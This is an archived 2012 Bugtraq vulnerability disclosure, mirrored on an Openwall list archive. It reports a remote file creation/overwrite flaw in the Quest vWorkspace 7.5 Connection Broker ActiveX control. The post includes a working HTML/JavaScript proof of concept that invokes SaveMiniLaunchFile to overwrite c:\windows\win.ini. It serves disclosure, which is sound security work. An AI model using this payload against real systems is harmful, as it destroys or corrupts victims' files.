| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 5 Apr 2012 12:18:46 GMT
From: nospam@...il.it
To: bugtraq@...urityfocus.com
Subject: Quest vWorkspace 7.5 Connection Broker Client ActiveX Control
(pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File
Creation / Overwrite
<!--
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547)
SaveMiniLaunchFile() Method Remote File Creation / Overwrite
ie7/8
vendor site: http://www.quest.com/
file tested: Quest_vWorkspace-75--32-bit_75.zip
Binary Path: C:\WINDOWS\system32\pnllmcli.dll
CLSID: {D9397163-A2DB-4A4A-B2C9-34E876AF2DFC}
Progid: PNLLM.Client.1
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
var obj = new ActiveXObject("PNLLM.Client.1");
obj.SaveMiniLaunchFile("","c:\\windows\\win.ini");
</script>
original url: http://retrogod.altervista.org/9sg_quest_vworkspace_poc.htm
Powered by blists - more mailing lists